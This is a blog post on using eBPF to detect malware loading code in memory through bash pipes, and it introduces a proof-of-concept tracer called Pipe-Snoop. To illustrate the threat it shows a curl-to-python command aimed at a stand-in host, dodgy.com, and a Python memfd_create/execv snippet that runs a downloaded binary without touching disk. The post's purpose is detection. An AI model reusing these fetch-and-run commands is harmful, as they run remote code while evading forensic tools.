tl;dr

eBPF is really awesome for lots of reasons, as an example I use it in this project to log when malware uses bash pipes (|) to do in-memory loading from the internet.

eBPF is hella neat

Extended Berkley Packet Filters (eBPF) is one of the coolest things happening to the Linux Kernel at the moment. I’m not going to be able to explain it any better than this page created by the eBPF community, but in essesence it allows you to easily write and run simple, safe, and (in very new kernels) portable programs into the kernel to do network routing or observe kernel or user mode function calls. This is done without the overheaded of a full kernel module, and with static and runtime protections to ensure a bug in your code can’t crash the entire system.

While it’s on its way to revolutionise how networking works in the kernel (in particular how it works with containers), another awesome use case is in observing program behaviour, without directly intercepting their behaviour, or attaching to them via a debugger/PTRACE.

Lots of malware (and even some legitimate programs) employ a number of tactics to prevent or detect when they are being debugged, so the ability to passivley observe what the malware does (what files it reads, what IP addresses it connects to, etc.) without letting the malware know is extremely useful. A great program the uses eBPF for this purpose is Tracee.

There’s lots of other real cool uses for eBPF in reverse engineering and malware analysis, I plan on writing more blogs with more examples, but I’ve picked one use-case to start with - in-memory loading.

A load of memory

If an attacker gains shell access to a system, it’s quite common to see the following pattern to download and run next-stage implant (or ransomware)

curl https://dodgy.com/loader.py | python -

This uses curl to download a script from the internet, and pass it directly into python via a pipe (|). By not first writing to disk, this technique can keep the script away from forensics teams, or security tools scanning the filesystem for suspicious files. And it’s not just scripts, attackers can pass Python a full PE to load and run, all in memory as well:

curl https://dodgy.com/dodgy_elf | python3 -c '
# Import libc
import sys
import os
from ctypes import CDLL
libc = CDLL("libc.so.6")

# Use memfd syscall to create an in-memory file
memfd_create = 319
fd = libc.syscall(memfd_create, "", 0)
data = sys.stdin.buffer.read()

# Write data from curls output
# to the in-memory file
os.write(fd, data)

# Run the in-memory binary
fd_path = f"/proc/self/fd/{fd}"
os.execv(fd_path, [fd_path,])
'

So how could we detect what is being passed around using pipes, especially without having to debug or attach to the programs directly. Before we can answer that, we need to understand exactly how | passes data from one program to the next.

Piping Around

(Note experts will have better descripion than this)

First, let’s reduct our example to this simple script:

bash -c "apple | banana"

That is, bash is used to pipe the output of the program apple into the program banana.

When this runs, a number of things happen:

Bash start

When bash starts, it has 3 file descriptors open:

  • 0: stdin, where the input is read from usually will point to the console the user is typing into
  • 1: stdout, where the ‘standard’ output is writtent to, and usually will point to the console the user is reading from
  • 2: stderr, where errors get printed to, usually the same place as stdout (and we’ll just ignore this for the rest of the example)

Diagram showing a single bash process #1 with two fd, 0 for standard out, and 1 for standard input

Bash pipe

Firstly, bash will use the syscall pipe to create an annonamous pipe. Pipes are a simple way for programs to communicate to each other. They are uni-directional, that is they have two ends: one end to write data into, and another to read data out from.

Pipes can have names, which means other programs can look on the filesystem to find them, but the pipe syscall specifically makes unnamed/anonamous pipes, which means only people that know the pipe exists is the kernel, the calling process, and its children. There is a very new feature of the kernel that allows one end of the pipe to be used by a seperate process, but that’s a bit complex and out-of-scope.

The call to pipe returns two file descriptors, 1 for each end of the pipe. For our example, lets say these fds are 4 for the end to write out of, and 3 is the end to read data in from.

Diagram the same as the last, but now two two more fds, 3 for 'pipe in' and 4 for 'pipe out'

Bash clone

After creating the pipe, bash will use the syscall clone twice to create the apple and banana processes. Both programs inhereat all of bash’s fds, so they also has fds 3 and 4.

important note this means both apple and banana start running at (almost) the same time, i.e. banana does not wait for apple to finish before running. This is an important feature, as it allows banana to start processing the output of apple without having to wait for it to finish.

Once both clones start, the original bash closes both ends of the pipe.

There are now two more boxes on the diagram for bash #2 and bash #3, both with the stdout, stdin, pipe in and pipe out. On Bash #1 pipe in and pipe out are marked 'closed'

Apple execve, close and dup2

When apple is created using clone, it isn’t running the apple binary straight away - it’s still bash, just a cloned version of it.

This cloned bash will close the read end of the pipe, e.g. 3, and then use the syscall dup2 to overwrite its stdout, or 1 fd, with the non-closed end of the pipe, e.g. dup2(4, 1).

This means that from then on, anytime the process writes to standard out, .e.g using printf, it will instead go into the pipe. This also means fd 4 is no longer needed (as 1 points to the same thing), and so it is also closed.

Once this is done, the cloned bash uses the syscall execve to replace itself with the apple binary. Doing this still keeps the pipe and stdout changes, so apple will be writing to the pipe, without it knowing or having to do anything.

Bash #1 has been renamed 'apple', and its fd 3 and 4 are marked closed. Its fd 1 is now marked 'pipe out'

Banana execve, close and dup2

At roughly the same time, the 2nd cloned bash will do the same thing, only instead it will close the write or 4 fd, then call dup2 to overwrite its stdin (or 0) fd with the read end of the pipe, e.g. dup2(3,0), then close 3. After this is will call execve to become banana.

Bash #2 has been renamed 'banana', and its fd 3 and 4 are marked closed. Its fd 0 is now marked 'pipe in'

Apple write

At this point, apple begins to write data to the pipe by calling write on it’s “standard out”, which is now the write end of the pipe.

Arrow showing data flowing from fd 1 'pipe out' in 'apple', to fd 0 'pipe in' in 'banana'

Banana read

At the same time, banana will use the syscall read to read from its “standard input”, which is now the read end of the pipe.

As apple writes, it will be read by banana, who can then do things with the data. As nothing was done to bananas stdout, anything banana prints out will go to the same place as the parent bash programs, which is probably the console/human eyeballs.

Arrow showing data flowing from 'banana' stdout fd through the parent bash's stdout, and upwards to the console

Apple Pipe close and exit.

Once apple finishes and exits, it will send a special ‘end of data’ down the pipe to banana, so it knows there nothing more to read.

Apple is now marked 'exited', and it had sent a 'end of data' to banana

Tracing the void

Now we know how | works, we can use eBPF to hook into the various syscalls, and see what is written and read. It will require a number of eBPF Programs linked together, attached to a number of different syscalls:

dup2

Firstly, monitor for processes using dup2 to overwrite either their stdout or stdin fds with some other non-standard fd. Keep track of the processes calling this, as from here until they either exit or call dup2 again anything going to either stdout or stdin (whichever was dup’d) will be going thrugh a pipe.

write

If a process we’re tacking writes to stout/fd 1, then it’s writing to a pipe! We can use bpf_probe_read_user to read the data the program is sending, and send it off along with the Process PID and Program executable name to be logged.

read

Similar to write, if a process we’re tacking reads from stdin/fd 0, it’s reading from a pipe. If we trace the ‘exit’ of the syscall, that is after the kernel has written the data into the buffer. We can now use bpf_probe_read_user before the program does, and send it off to be logged.

End Result

The End result is this program: Pipe-Snoop.

It’s a set of eBPF Loader and Programs to implement the above. If we build and run it as root, then run our original Python loader:

curl https://dodgy.com/loader.py | python -

We will see something like the following output:

...
Successfully started!
[*] curl[2860] wrote 37 bytes from piped stdout: 'print("I am a sneaky Python Loader")'
[*] python[2861] read 37 bytes from piped stdin: 'print("I am a sneaky Python Loader")'

Pipe-Snoop is a simple proof-of-concept - A more sophisticated program could also trace the clone calls, to match up the ends of the pipe with each other. But it gives you an idea of the power of eBPF, especially as it makes it possible without running any crash-prone kernel code, and without debugging/injecting/interacting with either program.